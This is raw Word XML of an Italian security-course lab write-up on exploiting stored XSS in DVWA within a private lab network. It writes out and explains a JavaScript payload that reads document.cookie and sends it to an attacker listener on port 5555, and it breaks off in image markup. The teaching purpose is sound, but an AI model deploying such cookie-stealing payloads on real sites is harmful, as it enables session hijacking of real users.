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F81166D" wp14:paraId="2DC08235" wp14:textId="4A55AC77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TRACCIA </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2: BWII</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="794C1B8D" w14:textId="451A9CE8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Traccia Giorno 2: Utilizzando le tecniche viste </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nelle lezioni</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> teoriche, sfruttare la vulnerabilità XSS persistente presente sulla Web Application DVWA al fine simulare il furto di una sessione di un utente lecito del sito, inoltrando i cookie «rubati» </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web server sotto il vostro controllo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="7AA822AD" w14:textId="7EE22723">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spiegare il significato dello script utilizzato. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="3AFE2438" w14:textId="20ED7382">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisiti laboratorio Giorno 2: Livello difficoltà DVWA: LOW </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="5FC55987" w14:textId="1DA9F68E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Kali Linux: 192.168.109.100/24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="236B563D" w14:textId="048072A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: 192.168.109.150/24 I cookie dovranno essere ricevuti su un Web Server in ascolto sulla porta 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="708DAC30" w14:textId="33EE0F18">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="627C1185" w14:textId="4D7BDE33">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GUIDA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="7B90DC3B" w14:textId="718A3B5B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Si possono utilizzare tecniche come l’inserimento di script malevoli nei campi di input, inserendo un payload XSS nella Web Application DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="455F5BDE" w14:textId="16C70376">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo caso uno script </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="554D91A4" w14:textId="48C3C010">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="56EE249E" w14:textId="667CAD7B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     var cookies = </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="7389F83D" w14:textId="0D03614F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  var </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xhr</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="61005694" w14:textId="4894BC06">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xhr.open</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>("GET", "</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://192.168.109.100:5555/?cookies=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">" + </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(cookies), </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="754DB5BE" w14:textId="0010BFE6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xhr.send</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="03DC31F5" w14:textId="1D38469D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="0B070DBA" w14:textId="79531C94">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dove :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="2877BDF1" w14:textId="682FE4C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">var cookies = </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>document.cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="030FCE3F" w14:textId="00388863">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F8116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it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Questa riga di codice utilizza </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F8116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it-IT"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F8116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it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per recuperare tutti i cookie impostati nel browser dell'utente corrente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="0D4B5A1C" w14:textId="4153A3C3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xhr</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="2A377F8D" w14:textId="76EAA3EF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Viene creato un oggetto ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>’ che serve a fare richieste HTTP da una pagina web verso un server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="4BF91262" w14:textId="04203048">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xhr.open</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("GET", "</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://192.168.109.100:5555/?cookies=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" + </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(cookies), true</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="4E394164" w14:textId="6C3A45C1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Viene aperta una richiesta GET verso l’URL specificato, contenente </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP:porta</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del server e seguito dal parametro ‘cookie’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="6EB890DA" w14:textId="68B04FEE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EncodeURIComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: per gestire caratteri speciali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="562CC167" w14:textId="6D11A4D4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xhr.send</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Viene</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> spedita la richiesta GET al server specificato, in questo caso quello dell’</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>attacante</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="1273E7E7" w14:textId="2C58B608">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una volta inserito lo script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="74349832" w14:textId="40CCDECE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="4CACE771" wp14:anchorId="6D20D583">
            <wp:extent cx="4465707" cy="2187130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
